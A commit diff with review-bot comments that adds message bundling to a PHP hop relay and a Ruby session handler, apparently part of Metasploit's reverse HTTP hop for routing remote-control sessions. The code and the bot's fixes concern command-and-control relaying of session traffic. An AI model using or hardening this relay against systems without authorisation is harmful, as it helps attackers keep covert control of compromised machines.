Added bundling to handle many sessions at once.
parent
c0983138a0
commit
022c52d087
|
@ -10,7 +10,7 @@ $url = $_SERVER["QUERY_STRING"];
|
||||||
//like /path/hop.php?/uRIcksm_lOnGidENTifIEr
|
//like /path/hop.php?/uRIcksm_lOnGidENTifIEr
|
||||||
|
|
||||||
//Looks for a file with a name or contents prefix, if found, send it and deletes it
|
//Looks for a file with a name or contents prefix, if found, send it and deletes it
|
||||||
function findSendDelete($tempdir, $prefix){
|
function findSendDelete($tempdir, $prefix, $one=true){
|
||||||
if($dh = opendir($tempdir)){
|
if($dh = opendir($tempdir)){
|
||||||
while(($file = readdir($dh)) !== false){
|
while(($file = readdir($dh)) !== false){
|
||||||
if(strpos($file, $prefix) !== 0){
|
if(strpos($file, $prefix) !== 0){
|
||||||
|
@ -18,7 +18,9 @@ function findSendDelete($tempdir, $prefix){
|
||||||
}
|
}
|
||||||
readfile($tempdir."/".$file);
|
readfile($tempdir."/".$file);
|
||||||
unlink($tempdir."/".$file);
|
unlink($tempdir."/".$file);
|
||||||
break;
|
if($one){
|
||||||
|
break;
|
||||||
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
@ -37,7 +39,7 @@ if($url === "/control"){
|
||||||
fwrite($f, $postdata);
|
fwrite($f, $postdata);
|
||||||
fclose($f);
|
fclose($f);
|
||||||
}else{
|
}else{
|
||||||
findSendDelete($tempdir, "up_");
|
findSendDelete($tempdir, "up_", false);
|
||||||
}
|
}
|
||||||
}else if($_SERVER['REQUEST_METHOD'] === 'POST'){
|
}else if($_SERVER['REQUEST_METHOD'] === 'POST'){
|
||||||
//get data
|
//get data
|
||||||
|
@ -56,6 +58,8 @@ if($url === "/control"){
|
||||||
$urlen = strlen($url);
|
$urlen = strlen($url);
|
||||||
fwrite($f, pack('V', $urlen));
|
fwrite($f, pack('V', $urlen));
|
||||||
fwrite($f, $url);
|
fwrite($f, $url);
|
||||||
|
$postdatalen = strlen($postdata);
|
||||||
|
fwrite($f, pack('V', $postdatalen));
|
||||||
fwrite($f, $postdata);
|
fwrite($f, $postdata);
|
||||||
fclose($f);
|
fclose($f);
|
||||||
//Initial query will be a GET and have a 12345 in it
|
//Initial query will be a GET and have a 12345 in it
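Review bot: With `$one` false the `/control` branch now sweeps every `up_` file, and `unlink()` runs whether or not `readfile()` succeeded and whether or not the writer has finished. The POST branch writes each length-prefixed record with several `fwrite()` calls and no lock is visible in these hunks, so a concurrent sweep could send a truncated record and delete the rest; how `$f` is opened lies outside the hunks, so this is inferred. Writing the record under a name that does not match the prefix and calling `rename()` to the `up_` name after `fclose($f)` would make each file appear complete, and `if(readfile($tempdir."/".$file) !== false){ unlink($tempdir."/".$file); }` keeps a file that could not be sent. The comment above `findSendDelete` should also document the new parameter, e.g. `//$one: stop after the first match (default); false sends and deletes every match`.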
|
||||||
|
|
|
@ -104,42 +104,44 @@ module ReverseHopHttp
|
||||||
next
|
next
|
||||||
end
|
end
|
||||||
|
|
||||||
# validate response
|
# validate responses, handle each message down
|
||||||
received = res.body
|
received = res.body
|
||||||
next if received.length < 12 || received.slice!(0, MAGIC.length) != MAGIC
|
until received.length < 12 || received.slice!(0, MAGIC.length) != MAGIC
|
||||||
|
|
||||||
# good response
|
# good response
|
||||||
delay = 0 # we're talking, speed up
|
delay = 0 # we're talking, speed up
|
||||||
urlen = received.slice!(0,4).unpack('V')[0]
|
urlen = received.slice!(0,4).unpack('V')[0]
|
||||||
urlpath = received.slice!(0,urlen)
|
urlpath = received.slice!(0,urlen)
|
||||||
|
datalen = received.slice!(0,4).unpack('V')[0]
|
||||||
|
|
||||||
# do not want handlers to change while we dispatch this
|
# do not want handlers to change while we dispatch this
|
||||||
hop_http.lock.lock
|
hop_http.lock.lock
|
||||||
#received is now the binary contents of the message
|
#received now starts with the binary contents of the message
|
||||||
if hop_http.handlers.include? urlpath
|
if hop_http.handlers.include? urlpath
|
||||||
pack = Rex::Proto::Http::Packet.new
|
pack = Rex::Proto::Http::Packet.new
|
||||||
pack.body = received
|
pack.body = received.slice!(0,datalen)
|
||||||
hop_http.current_url = urlpath
|
hop_http.current_url = urlpath
|
||||||
hop_http.handlers[urlpath].call(hop_http, pack)
|
hop_http.handlers[urlpath].call(hop_http, pack)
|
||||||
hop_http.lock.unlock
|
hop_http.lock.unlock
|
||||||
elsif !closed_handlers.include? urlpath
|
elsif !closed_handlers.include? urlpath
|
||||||
hop_http.lock.unlock
|
hop_http.lock.unlock
|
||||||
#New session!
|
#New session!
|
||||||
conn_id = urlpath.gsub("/","")
|
conn_id = urlpath.gsub("/","")
|
||||||
# Short-circuit the payload's handle_connection processing for create_session
|
# Short-circuit the payload's handle_connection processing for create_session
|
||||||
# We are the dispatcher since we need to handle the comms to the hop
|
# We are the dispatcher since we need to handle the comms to the hop
|
||||||
create_session(hop_http, {
|
create_session(hop_http, {
|
||||||
:passive_dispatcher => self,
|
:passive_dispatcher => self,
|
||||||
:conn_id => conn_id,
|
:conn_id => conn_id,
|
||||||
:url => uri.to_s + conn_id + "/\x00",
|
:url => uri.to_s + conn_id + "/\x00",
|
||||||
:expiration => datastore['SessionExpirationTimeout'].to_i,
|
:expiration => datastore['SessionExpirationTimeout'].to_i,
|
||||||
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
|
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
|
||||||
:ssl => false,
|
:ssl => false,
|
||||||
})
|
})
|
||||||
# send new stage to hop so next inbound session will get a unique ID.
|
# send new stage to hop so next inbound session will get a unique ID.
|
||||||
hop_http.send_new_stage
|
hop_http.send_new_stage
|
||||||
else
|
else
|
||||||
hop_http.lock.unlock
|
hop_http.lock.unlock
|
||||||
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
hop_http.monitor_thread = nil #make sure we're out
|
hop_http.monitor_thread = nil #make sure we're out
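Review bot: `received.slice!(0,datalen)` runs only in the `hop_http.handlers.include? urlpath` branch, so for a new-session or closed-handler message with a non-empty body the body stays at the front of `received`, the next `until` test compares body bytes with `MAGIC`, and the remaining bundled messages are dropped. Consume the body before branching: `body = received.slice!(0, datalen)` right after `datalen` is read, then `pack.body = body`. `datalen` is also used unchecked: on a truncated response `unpack('V')[0]` is nil and `slice!(0, nil)` raises while `hop_http.lock` is held, so a guard such as `break if datalen.nil? || received.length < datalen` belongs before `hop_http.lock.lock`. No `ensure` releasing the lock is visible here, and the enclosing loop and method start and end outside the hunk.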
|
||||||
|
|